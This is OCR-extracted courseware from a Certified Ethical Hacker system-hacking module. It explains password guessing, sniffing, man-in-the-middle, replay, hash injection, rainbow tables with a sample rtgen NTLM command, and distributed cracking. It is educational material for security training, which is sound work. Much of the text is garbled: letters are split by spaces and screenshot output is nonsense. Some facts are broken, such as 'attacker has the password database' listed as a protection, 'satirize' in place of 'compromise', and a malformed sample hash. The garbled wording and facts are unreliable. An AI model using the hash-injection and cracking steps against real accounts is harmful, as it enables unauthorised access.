  • 19. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker |1gn,‫׳‬nd A ctive O n lin e A ttacks n1 A n a c tiv e o n l i n e a t t a c k is t h e e a s ie s t w a y t o g ain u n a u t h o r i z e d a d m i n i s t r a t o r - l e v e l access t o t h e s y s te m . T h e r e a re t h r e e ty p e s o f A c t iv e O n lin e A tta c k s . T h e y are: 0 P a s s w o rd g ue ssin g 0 T r o j a n / s p y w a r e / k e y lo g g e r 0 Hash in je c t io n 0 Ph ishin g O ffline A ttacks O f f l i n e a t t a c k s o c c u r w h e n t h e i n t r u d e r ch e c k s t h e v a l i d i t y o f t h e p a s s w o r d s . He o r sh e o b s e rv e s h o w t h e p a s s w o r d is s t o r e d in t h e t a r g e t e d s y s t e m . If t h e u s e r n a m e s a n d t h e p a s s w o r d s a re s t o r e d in a file t h a t is r e a d a b le , it b e c o m e s easy f o r t h e i n t r u d e r t o g a in access t o t h e s y s te m . In o r d e r t o p r o t e c t y o u r p a s s w o r d s list t h e y s h o u ld a lw a y s be k e p t in an u n r e a d a b l e f o r m , w h i c h m e a n s t h e y h a v e t o be e n c r y p t e d . O ff li n e a tta c k s a re o f t e n t i m e c o n s u m in g . T h e y a re su c ce ssfu l b e c a u s e t h e L M h a s h e s are v u ln e r a b l e due to a s m a lle r keyspace and sh o rte r le n g t h . D iffe re n t p assw ord c r a c k in g t e c h n i q u e s a re a v a ila b le o n t h e I n t e r n e t . T h e t e c h n i q u e s t o p r e v e n t o r p r o t e c t f r o m o f f l i n e a tta c k s are: 0 Use g o o d p a s s w o rd s 0 R e m o v e LM hashes 0 A t t a c k e r has t h e p a s s w o r d d a ta b a s e 0 Use c r y p t o g r a p h ic a lly s e c u re m e t h o d s w h i l e r e p r e s e n t in g t h e p a s s w o rd s T h e r e are t h r e e t y p e s o f o f f l i n e a tta c k s . T h e y are: 0 P r e - c o m p u t e d hashes 0 D is t r ib u t e d n e t w o r k 0 R a in b o w ------ ------------------------------------------------ k n o w n as n o n - t e c h n ic a l a tta c k s . This k in d o f a t t a c k d o e s n ' t r e q u ir e a n y te c h n ic a l k n o w le d g e a b o u t t h e m e t h o d s o f i n t r u d i n g i n t o a n o t h e r 's s y s te m . T h e r e f o r e , it is c a lle d a n o n - e l e c t r o n i c a tta c k . T h e r e a re t h r e e ty p e s o f n o n - e l e c t r o n i c a tta c k s . T h e y are: 0 S h o u ld e r s u rfin g 0 Social e n g in e e r in g 0 D u m p s t e r d iv in g Module 05 Page 535 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 20. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Passive O nline A ttack: W ire Sniffing CEH Q Attackers run packet sniffer tools on the local area network (LAN) to access and record the raw network traffic Com putationally Com plex Victim Attacker Victim The captured data may include sensitive information such as passwords (Telnet, FTP, rlogin sessions, etc.) and emails Sniffed credentials are used to gain unauthorized access to the target system Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. -7—-1 P a ssiv e O n lin e A ttack: W ire Sniffing 7 M m ---------- - 3 A p a c k e t s n i f f e r t o o l is s e ld o m used f o r an a tta c k . T his is b e c a u s e a s n if f e r can w o r k o n l y in a c o m m o n c o llis io n d o m a i n . C o m m o n c o ll i s i o n d o m a i n s a re n o t c o n n e c t e d b y a s w it c h o r b rid g e . All t h e h o s ts o n t h a t n e t w o r k a re a lso n o t s w i t c h e d o r b r id g e d in t h e n e t w o r k s e g m e n t. As s n if fe r s g a t h e r p a c k e ts a t t h e D a ta L in k L a ye r, t h e y can g ra b all p a c k e ts o n t h e LAN o f th e m a c h in e t h a t is r u n n i n g t h e s n i f f e r p r o g r a m . T his m e t h o d is r e l a t iv e l y h a r d t o p e r p e t r a t e a n d is c o m p u t a t io n a lly c o m p lic a te d . T his is b e c a u s e a n e t w o r k w i t h a h u b i m p l e m e n t s a b r o a d c a s t m e d i u m t h a t all s y s te m s s h a re o n t h e LAN. A n y d a ta s e n t acro ss t h e LAN is a c tu a lly s e n t t o e a c h a n d e v e r y m a c h in e c o n n e c t e d t o t h e LAN. If an a t t a c k e r r u n s a s n if f e r o n o n e s y s te m o n t h e LAN, he o r she can g a t h e r d a ta s e n t t o a n d f r o m a n y o t h e r s y s te m o n t h e LAN. T h e m a j o r i t y o f s n i f f e r t o o l s a re id e a lly s u it e d t o s n if f d a ta in a h u b e n v i r o n m e n t . T h e se t o o l s a re c a lle d p assive s n if fe r s as t h e y p a s s iv e ly w a i t f o r d a ta t o be s e n t, b e f o r e c a p t u r i n g t h e i n f o r m a t i o n . T h e y a re e f f i c i e n t a t i m p e r c e p t i b l y g a t h e r i n g d a t a f r o m t h e LAN. T h e c a p t u r e d d a ta m a y in c lu d e p a s s w o r d s s e n t t o r e m o t e s y s te m s d u r in g T e l n e t , FTP, r lo g i n se s s io n s , a nd e le c t r o n i c m a il s e n t a n d r e c e iv e d . S n i f f e d c r e d e n t i a l s a re used t o g ain u n a u t h o r i z e d access t o t h e t a r g e t s y s te m . T h e r e a re a v a r i e t y o f t o o ls a v a ila b le o n t h e I n t e r n e t f o r p a s s iv e w i r e s n if f i n g . Module 05 Page 536 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 21. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Victim Module 05 Page 537 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 22. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker P a ssiv e O n lin e A ttacks: M an-in-theM id d le a n d R eplay A ttack Victim CEH Web Server Attacker Considerations In a MITM attack, the attacker acquires access to the communication channels between victim and server to extract the information Relatively hard to perpetrate In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant info is extracted, thetokens are placed back on the network to gain access Must be trusted by one or both sides Can sometimes be broken by invalidating traffic Copyright © by E&Coincil. All Rights Reserved. Reproduction isStrictly Prohibited. ^ P a ssiv e O n lin e A ttack: M a n ‫־‬in ‫־‬th e ‫־‬M id d le an d R ep lay A ttack ‫י‬ W h e n t w o p a r tie s a re c o m m u n i c a t i n g , t h e m a n - i n - m i d d l e a t t a c k can ta k e p la ce. In t h is case, a t h i r d p a r t y i n t e r c e p t s t h e c o m m u n i c a t i o n b e t w e e n t h e t w o p a r tie s , a s s u rin g t h e t w o p a r tie s t h a t t h e y are c o m m u n i c a t i n g w i t h e a ch o t h e r . M e a n w h i l e , t h e t h i r d p a r t y a lt e r s t h e d a ta o r e a v e s d r o p s a n d passes t h e d a ta a lo n g . T o c a r r y o u t th is , t h e m a n in m id d l e has t o s n i f f f r o m b o t h sides o f t h e c o n n e c t i o n s i m u l t a n e o u s ly . T his t y p e o f a t t a c k is o f t e n f o u n d in t e l n e t and w ir e le s s t e c h n o l o g i e s . It is n o t easy t o i m p l e m e n t such a tta c k s d u e t o t h e TCP s e q u e n c e n u m b e r s a n d s p e e d . This m e t h o d is r e l a t iv e l y h a r d t o p e r p e t r a t e a n d can be b r o k e n s o m e t i m e s by in v a lid a tin g th e tra ffic . In a r e p la y a tta c k , p a c k e ts a re c a p t u r e d u sin g a s n if fe r . A f t e r t h e r e l e v a n t i n f o r m a t i o n is e x t r a c t e d , t h e p a c k e ts a re p la c e d b a ck o n t h e n e t w o r k . This t y p e o f a t t a c k can be u sed t o r e p la y b a n k t r a n s a c t i o n s o r o t h e r s i m i l a r ty p e s o f d a ta t r a n s f e r in t h e h o p e o f r e p l i c a t i n g o r c h a n g i n g a c tiv it ie s , such as d e p o s its o r tr a n s fe r s . Module 05 Page 538 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 23. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Original Connection M r Victim ................... » .................... O ................ » .■........................... > Sniff MITM / Replay W eb Server Traffic FIGURE 5.4: Passive Online Attack by Using Man-in-the-Middle and Replay Attack Module 05 Page 539 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 24. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Active O nline Attack: Passw ord G uessing Network I The attacker takes a set of dictionary words and names, and tries all the possible combinations to crack the password C EH Network Server Network --------- /c n = < !_! Considerations Network - Time consuming 1 1 Requires huge amounts of network bandwidth J Easily detected Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. A ctive O n lin e A ttack: P assw o rd G u e ssin g E v e r y o n e k n o w s y o u r u s e r n a m e , b u t y o u r p a s s w o r d is a w e l l - k e p t s e c re t in o r d e r t o k e e p o t h e r s a w a y f r o m a c c e s s in g y o u r tr a n s a c t io n s . W i t h t h e aid o f d i c t i o n a r y a t t a c k m e t h o d o l o g i e s , an i n t r u d e r tr ie s m a n y m e a n s t o g u e s s y o u r p a s s w o r d . In th is m e t h o d o l o g y , an a t t a c k e r ta k e s a s e t o f d i c t i o n a r y w o r d s a n d n a m e s , a n d m a k e s all t h e p o s s ib le c o m b i n a t i o n s t o g e t y o u r p a s s w o r d . T h e a t t a c k e r p e r f o r m s t h is m e t h o d w i t h p r o g r a m s t h a t guess h u n d r e d s o r th o u s a n d s o f w o r d s p e r s e c o n d . T his m a k e s it e a s y f o r t h e m t o t r y m a n y v a r i a t i o n s : b a c k w a r d s w o r d s , d i f f e r e n t c a p i t a l i z a t i o n , a d d in g a d ig i t t o t h e e n d , e tc. T o f a c i li t a t e t h is f u r t h e r , t h e a t t a c k e r c o m m u n i t y has b u i l t large d i c t i o n a r i e s t h a t in c lu d e w o r d s f r o m f o r e i g n la n g u a g e s, o r n a m e s o f th in g s , places, a n d t o w n s m o d e l e d t o c ra c k p a s s w o r d s . A t t a c k e r s can also scan y o u r p r o f i le s t o lo o k f o r w o r d s t h a t m i g h t b r e a k y o u r p a s s w o r d . A g o o d p a s s w o r d is easy t o r e m e m b e r , b u t h a rd t o guess, so y o u n e e d t o p r o t e c t y o u r p a s s w o r d by m a k in g it a p p e a r r a n d o m by i n s e r t in g such t h in g s as d ig its a n d p u n c t u a t i o n . T h e m o r e i n t r i c a t e y o u r p a s s w o r d , t h e m o r e d i f f i c u l t it b e c o m e s f o r t h e i n t r u d e r t o b r e a k . Module 05 Page 540 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 25. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Attacker FIGURE 5.5: Active Online Attack by Using Password Guessing Method S o m e o f t h e c o n s i d e r a t i o n s f o r p a s s w o r d g u e s s in g a re as f o l lo w s : 0 T akes a lo n g t i m e t o be g ue ss ed 0 R e q u ire s h u g e a m o u n t s o f n e t w o r k b a n d w i d t h 0 It can be e a sily d e t e c t e d Module 05 Page 541 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 26. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker _ Active O nline Attack: Troj an/Spy w are/K ey logger CEH Spyware is a type o f m alware th a t allows attackers to secretly gather inform ation about a person or organization W ith the help o f a Trojan, an attacker gets access to the stored passwords in the attacked com puter and is able to read personal documents, delete files, and display pictures A Keylogger is a program th a t runs in the background and allows rem ote attackers to record every keystroke vv/ Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. A ctive O n lin e A ttack: Troj an /S p y w a re /K e y lo g g e r A T r o ja n is a d e s t r u c t i v e p r o g r a m s t h a t s u b t e r f u g e as a b e n ig n a p p li c a t i o n . P r io r t o t h e in s t a l l a t i o n a n d / o r e x e c u t i o n , t h e s o f t w a r e i n i t i a ll y a p p e a rs t o p e r f o r m a d e s ir a b le f u n c t i o n , b u t in p r a c tic e it ste als i n f o r m a t i o n o r h a r m s t h e s y s te m . W i t h a T r o ja n , a t ta c k e r s m a y h a ve r e m o t e access t o t h e t a r g e t c o m p u t e r . A t t a c k e r s can h a ve access t o t h e c o m p u t e r r e m o t e l y a n d p e r f o r m v a r io u s o p e r a t i o n s t h a t a re l i m i t e d b y u s e r p r i v i le g e s o n t h e t a r g e t c o m p u t e r , by in s t a llin g t h e T r o ja n . S p y w a r e is a t y p e o f m a l w a r e t h a t can be in s t a lle d o n a c o m p u t e r t o g a t h e r i n f o r m a t i o n a b o u t t h e users o f t h e c o m p u t e r w i t h o u t t h e i r k n o w l e d g e . T his a llo w s a tt a c k e r s t o g a t h e r i n f o r m a t i o n a b o u t t h e u se r o r t h e o r g a n i z a t i o n s e c re tly . T h e p r e s e n c e o f s p y w a r e is t y p i c a l l y h id d e n f r o m t h e user, a n d can be d i f f i c u l t t o d e te c t. A k e y lo g g e r is a p r o g r a m t h a t re c o rd s all t h e k e y s t r o k e s t h a t a re t y p e d o n t h e c o m p u t e r k e y b o a r d w i t h o u t t h e k n o w l e d g e o f t h e user. O n c e k e y s tr o k e s a re lo g g e d , t h e y a re s h ip p e d t o t h e a t t a c k e r , o r h id d e n in t h e m a c h in e f o r l a t e r r e t r ie v a l. T h e a t t a c k e r t h e n s c r u t i n iz e s t h e m c a r e f u l l y f o r t h e p u r p o s e o f f i n d i n g p a s s w o r d s o r o t h e r u s e fu l i n f o r m a t i o n t h a t c o u ld be u sed t o c o m p r o m i s e t h e s y s te m . For e x a m p le , a k e y lo g g e r is c a p a b le o f r e v e a l i n g t h e c o n t e n t s o f all e m a ils c o m p o s e d b y t h e u s e r o f t h e c o m p u t e r s y s te m o n w h i c h t h e k e y lo g g e r has b e e n in s ta lle d . Module 05 Page 542 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 27. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Active O nline Attack: Hash Injection Attack A • CEH A hash injection attack allows an attacker to inject a compromised hash into a local session and use the hash to validate to network resources •• The attacker finds and extracts a logged on domain admin •• account hash ^ The attacker uses the extracted hash to log on to the domain controller Inject a compromised hash into a local session — v 1. ‫־ ״‬ 1 Attacker I k k Victim Computer Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. A ctive O n lin e A ttack: H ash In je c tio n A ttack A hash in j e c t i o n a t t a c k is t h e c o n c e p t o f i n j e c t i n g a c o m p r o m i s e d h a sh i n t o a local session a n d t h e n u sin g t h e hash t o a u t h e n t i c a t e t o t h e n e t w o r k re s o u rc e s . T his a t t a c k is d o n e s u c c e s s fu lly in f o u r s te p s . T h e y a re : © T h e h a c k e r c o m p r o m i s e s o n e w o r k s t a t i o n / s e r v e r u sin g a l o c a l / r e m o t e e x p l o i t © T h e h a c k e r e x tr a c ts lo g g e d - o n h ash e s a n d f in d s a lo g g e d - o n d o m a i n a d m in a c c o u n t hash © T h e h a c k e rs use t h e hash t o log o n t h e d o m a i n c o n t r o l l e r © T h e h a c k e r e x tr a c ts all t h e h ash es in t h e A c t i v e D i r e c t o r y d a t a b a s e a n d can n o w s a tiriz e a n y a c c o u n t in t h e d o m a i n Inject a com prom ised hash into a local session Attacker if Victim Computer FIGURE 5.6: Active Online Attack by Using Hash Injection Attack Module 05 Page 543 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 28. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker O ffline A ttack: Rainbow A ttacks I CEH Convert huge word lists It is easy to recover list of possible passwords and compare it with the precomputed hash table. passwords by comparing captured password hashes to the techniques such as Compute the hash for a like dictionary files and brute force lists into password hashes using If a match is found then the password is cracked precomputed tables rainbow tables Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. O ffline A ttack: R ainbow A ttacks D-fra O f f lin e a tta c k s o c c u r w h e n t h e i n t r u d e r ch e cks t h e v a l i d i t y o f t h e p a s s w o r d s . He o r sh e o b s e rv e s h o w t h e p a s s w o r d is s t o r e d . If t h e u se r n a m e s a n d t h e p a s s w o r d s a re s t o r e d in a file t h a t is r e a d a b l e , it b e c o m e s easy f o r h im o r h e r t o g ain access t o t h e s y s te m . H e n ce , t h e p a s s w o r d s list m u s t be p r o t e c t e d a n d k e p t in an u n r e a d a b l e f o r m , such as an e n c r y p t e d f o r m . O ff li n e a tta c k s a re t i m e c o n s u m in g . T h e y a re su cce ssfu l b e c a u s e t h e L M h a s h e s a re v u ln e r a b l e d u e t o s m a lle r k e y s p a c e a nd s h o r t e r le n g t h . D iffe re n t p a ssw ord c r a c k in g t e c h n i q u e s are a v a ila b le o n t h e I n t e r n e t . T h e r e a re t w o t y p e s o f o f f l i n e a tta c k s t h a t an a t t a c k e r can p e r f o r m t o d is c o v e r t h e p a s s w o r d , e R a in b o w A t ta c k s 0 D i s t r i b u t e d n e t w o r k A t ta c k s ___ R ainbow A ttacks A r a i n b o w a t t a c k is t h e i m p l e m e n t a t i o n o f t h e c r y p t a n a l y t i c t i m e - m e m o r y t r a d e - o f f t e c h n i q u e . C r y p t a n a l y t i c t i m e - m e m o r y t r a d e - o f f is t h e m e t h o d t h a t r e q u ir e s less t i m e f o r c ry p ta n a ly s is . It uses a lr e a d y c a lc u la te d i n f o r m a t i o n s t o r e d in t h e m e m o r y t o c ra c k t h e c r y p t o g r a p h y . In t h e Module 05 Page 544 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 29. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker r a i n b o w a tta c k , t h e s a m e t e c h n i q u e is u se d ; t h e p a s s w o r d hash t a b l e is c r e a te d in a d v a n c e a nd s t o r e d i n t o t h e m e m o r y . Such a t a b l e is ca lle d a " r a i n b o w t a b l e . " R ainbow T ab le *Z A r a i n b o w t a b l e is a lo o k u p t a b l e s p e c ia lly u sed in r e c o v e r i n g t h e p l a i n t e x t p a s s w o r d f r o m a c i p h e r t e x t . The a t t a c k e r uses t h i s t a b l e t o lo o k f o r t h e p a s s w o r d a n d tr ie s t o r e c o v e r th e p a s s w o r d f r o m p a s s w o r d hashes. C o m p u ted H ash es — th e A n a t t a c k e r c o m p u t e s t h e hash f o r a list o f p o s s ib le p a s s w o r d s a n d c o m p a r e s it w i t h p re -c o m p u te d hash t a b l e ( r a i n b o w ta b le ) . If a m a t c h is f o u n d , t h e n t h e p a s s w o r d is cracked. C o m p are th e H ash es It is easy t o r e c o v e r p a s s w o r d s b y c o m p a r i n g c a p t u r e d p a s s w o r d h as h e s t o t h e p r e c o m p u t e d t a b le s . P re-C o m p u ted H ash es O n ly e n c r y p t e d p a s s w o r d s s h o u ld be s t o r e d in a f ile c o n t a i n i n g u s e r n a m e / e n c r y p t e d p a s s w o r d p a irs . T h e t y p e d p a s s w o r d is e n c r y p t e d u s in g t h e hash f u n c t i o n o f c r y p t o g r a p h y d u r in g t h e lo g o n p ro c e s s , a n d it is t h e n c o m p a r e d w i t h t h e p a s s w o r d t h a t is s t o r e d in t h e file . E n c r y p te d p a s s w o r d s t h a t a re s t o r e d can p r o v e useless a g a in s t d i c t i o n a r y a t t a c k s . If t h e file t h a t c o n t a in s t h e e n c r y p t e d p a s s w o r d is in a r e a d a b le f o r m a t , t h e a t t a c k e r can e asily d e t e c t t h e hash f u n c t i o n . He o r she can t h e n d e c r y p t e ach w o r d in t h e d i c t i o n a r y u sin g t h e hash f u n c t i o n , a n d t h e n c o m p a r e w i t h t h e e n c r y p t e d p a s s w o r d . T h u s t h e a t t a c k e r o b t a i n s all p a s s w o r d s t h a t a re w o r d s lis te d in t h e d ic t io n a r y . S to ra g e o f h ash e s r e q u ir e s la rg e m e m o r y sp ace such as LM " h a s h e s " r e q u i r e 3 1 0 T e r a b y te s a nd NT H ashes < 15 ch a rs r e q u ir e s 5 , 6 5 2 , 8 9 7 , 0 0 9 E x a b y te s . Use a t i m e - s p a c e t r a d e o f f t e c h n i q u e t o r e d u c e m e m o r y sp ace r e q u i r e d t o s to r e hashes. Iqazwed -> 4259cc34599c530b28a6a8f225d668590 hh021da -> c744bl716cbf8d4dd0ff4ce31al77151 9da8dasf -> 3cd696a8571a843cda453a229d741843 sodifo8sf -> 7ad7d6fa6bb4fd28ab98b3dd33261e8f Module 05 Page 545 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 30. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Tools to C reate Rainbow Tables: W inrtgen and rtg en The rtgen program need several parameters to generate a rainbow table, the syntax of the command line is: Winrtgen is a graphical Rainbow Tables Generator that supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHAl, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table index chain len chain num part index Administrator Command Prompt - rtgen ntJm loweralpha 1 7 0 1000 4000000 0 1 ~ i ° C :lls ers N ftd nin istpa tn rN D ou n lofldxNt'a inliawc t*sck‫ ־‬l . 5 ‫ ־‬u in 6 4 > rtg e n n t l n CEH Rainbow Table properties x laM cpulp ChainL ■ 1 C 24 O 1 »«lnbow ta b le n t 1™_lo1w1*dlu)M«l-y_0_l«UUx4UUlKWO_tt.rt param eters iMch a lg o r ith m : n t ln Itash le n g th : 16 :h a r o e t: ahcdof gh i.ih lm n o p a rc tu v u x v c ‫־‬hnr.net in he x : . 61 62 63 64 65 G G7 68 69 6 a 6h 6c 6d 6e 6 f 78 71 G 74 7S 76 77 78 77 7a cha rset le n g th : 26 |‫־‬h ka [#>6CO£FQHIJW.MNOPQRSrUWvW2 Key *oocf 8353C82502 keys DW. « « :• 610 :5 M 3 Succfzi tr l«I.Uy 0 978333 |978(K| loq uo nt 141 3 t a r t in tf p o in t b o gin from 0 <0x0090000000000000 < > k!»!»3fc o f 1MHHHHH ra in h o u r.h n in .1 ge ne rate d <H n 7 .6 a I 111vr: ‫ ״‬I •1M W M r » ‫ ו‬nhou f l w i n i M WU <U n V . 6 »< : 7M.HH o f 4W M M rn in h n u c ho i n i y r ‫ ««•. > ״‬r .l <8 it 7 .7 s MMW r tfc2144 o f 48W8888 m iu lw u ch« in« :!•■ ••ra te d < n 7 .6 •< 11 ( o f 4080090 rainb ow c ha lnu ge ne rate d <0 1• 7 .6 v 27680 < 41 . Oplitnil 0 4 ‫־‬ >t«p .p««d ‫ ז‬arte p‫׳‬rt‫(־‬n r1r*1pn hmr T0Ui (■•ccirpuUlun in•; M» rim «- B re w rk e *a h ttp ://w w w .o xid .it http://project-rainbowcrack.com Copyright© by E&GaUKfl. All Rights Reserved. Reproduction is Strictly Prohibited. Tools to C re a te R ainbow T ab les: W in rtg en a n d rtg e n A t t a c k e r s can c r e a te r a i n b o w t a b l e s b y u sin g f o l l o w i n g to o ls . W in rtg en v— ‫׳׳‬ S o u rc e : h t t p : / / w w w . o x i d . i t W i n r t g e n is a g ra p h ic a l R a in b o w T a b le s G e n e r a t o r t h a t h e lp s a tt a c k e r s t o c r e a t e r a i n b o w ta b le s f r o m w h i c h t h e y can c ra c k t h e h a s h e d p a s s w o r d . It s u p p o r t s L M , F a stL M , N T L M , LMCHALL, H alfL M C H A L L , N TLM C H A LL, MSCACHE, MD2, MD4, MD5, SHA1, R IP E M D 1 6 0 , M ySQL323, M y S Q L S H A l, CiscoPIX, ORACLE, SHA-2 (2 5 6 ), SHA-2 (38 4), a n d SHA-2 (5 1 2 ) hashes. Module 05 Page 546 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 31. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Rainbow Table properties Mr! Len Max Len le n Index index Char* Len in Chain Count N* of tables ‫פ‬ Charset |a h lp a Edit [ABCDEFGHUKLMNOPQRSTUVWXYZ Table properties Key space: 8353082582 keys Disk space: 810.35 MB Success probab*ty: 0.978038 (97.80*) Benchmark Optional parameter Hash speed !Administrator Step speed Table precomputation time Total precomputation time: Max cryptanalysis time: jj Benchmark Cancel | FIGURE 5.7: Winrtgen Generate Rainbow Table in Window S o u rc e : h t t p : / / p r o 1 c t - r a in b o w c r a c k . c o m e R a in b o w C r a c k is a g e n e r a l p r o p o s e i m p l e m e n t a t i o n t h a t ta k e s a d v a n ta g e o f t h e t i m e - m e m o r y t r a d e - o f f t e c h n i q u e t o c ra c k hashes. T his p r o je c t a llo w s y o u t o c ra c k a h a s h e d p a s s w o r d . T he r tg e n t o o l o f t h is p r o j e c t is u sed t o g e n e r a t e t h e r a i n b o w ta b le s . T h e r tg e n p r o g r a m n e e d s s e v e ra l p a r a m e t e r s t o g e n e r a t e a r a i n b o w t a b l e ; y o u can use f o l l o w i n g s y n t a x o f t h e c o m m a n d lin e t o g e n e r a t e r a i n b o w ta b le s : Syntax: r tg e n h a s h _ a lg o r i t h m c h a r s e t p la i n t e x t _ l e n _ m i n p l a i n t e x t _ l e n _ m a x t a b l e j n d e x c h a i n j e n c h a in _ n u m p a r t j n d e x Administrator: Command Prompt - rtgen ntlm loweralpha 1 7 0 1000 4000000 0 _ □ X nistratorDownloadsrainbowcrack‫־‬l.5‫־‬win64>rtgen ntln loweralpha 1 MUM 0 ntlm_loweralphattl1000_0_7‫־‬x4000000_0.rt parameters n: ntln 16 abcdefghijklnnopqrstuvwxyz x: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 78 79 7a h: 26 gth range: 1 - 7 : 0x00000000 al: 8353082582 arting point begin fron 0 <0x0000000000000000) 000 rainbow chains generated <0 n 0000 rainbow chains generated <0 0000 rainbow chains generated <0 0000 rainbow chains generated <0 0000 rainbow chains generated <0 0000 rainbow chains generated <0 7.6 s> n 7.6 s) n 7.7 s) n 7.6 s) n 7.6 s) n 7.6 s) FIGURE 5.8: rtgen Generate Rainbow Table in Window Module 05 Page 547 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 32. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Distributed Network Attack C EH A Distributed N etw ork Attack (DNA) technique is used for recovering passwordprotected files using the unused processing pow er of m achines across th e ne tw o rk to decrypt passwords In this attack, a DN A m anager is installed in a central location w here machines running DN A clients can access it o v e rth e network / f ‫ץ‬ ^ f The D N A M a n a g e r DNA Manager is in s ta lle d in a coordinates th e attack and allocates small th e b a c k g ro u n d , c e n tra l lo c a tio n p o rtions o f th e key search to machines th a t are d is trib u te d over th e n e tw o rk w h e r e m a c h in e s ru n n in g o n D N A C lie n t can access it L . r D N A C lie n t ru ns in o v e r th e n e tw o rk c o n s u m in g o n ly ► un u se d p ro ce sso r ► tim e i ^ The program com bines th e processing capabilities o f all the clients connected to n e tw o rk and uses it to pe rfo rm key search to de crypt th e m j Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. D istrib u te d N etw ork A ttacks A D i s t r i b u t e d N e t w o r k A t t a c k (D N A ) is t h e t e c h n i q u e used f o r r e c o v e r i n g p a s s w o r d p r o t e c t e d file s . It u tiliz e s t h e u n u s e d p ro c e s s in g p o w e r o f m a c h in e s acro ss t h e n e t w o r k t o d e c r y p t p a s s w o r d s . In t h is a tta c k , a D N A m a n a g e r is in s t a lle d in a c e n t r a l l o c a tio n w h e r e m a c h in e s r u n n i n g D N A c lie n ts can access it o v e r t h e n e t w o r k . T h e D N A m a n a g e r c o o r d i n a t e s t h e a tta c k , a ssig n in g s m a ll p o r t i o n s o f t h e k e y s e a rc h t o m a c h in e s d i s t r i b u t e d t h r o u g h o u t t h e n e t w o r k . T h e D N A c l i e n t r u n s in t h e b a c k g r o u n d , o n l y t a k i n g u n u s e d p ro c e s s o r t i m e . T h e p r o g r a m c o m b in e s t h e p ro c e s s in g c a p a b ilit ie s o f all t h e c lie n ts c o n n e c t e d t o n e t w o r k a n d uses t h e m t o p e r f o r m a k e y s e a rch o n O ffic e 9 7 a n d 2 0 0 0 t o d e c r y p t t h e m . F ea tu res o f th e D N A : © Reads s ta tis tic s a nd g ra p h s e a sily © A d d s u s e r d ic t io n a r ie s t o c ra c k t h e p a s s w o r d © O p tim iz e s p a s s w o r d a tta c k s f o r s p e c ific la n g u a g e s © M o d i f i e s t h e u s e r d ic t io n a r ie s © C o m p r is e s o f s t e a lt h c l i e n t in s t a l l a t i o n f u n c t i o n a l i t y © A u t o m a t i c a l l y u p d a t e s c l i e n t w h i l e u p d a t i n g t h e D N A s e rv e r Module 05 Page 548 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
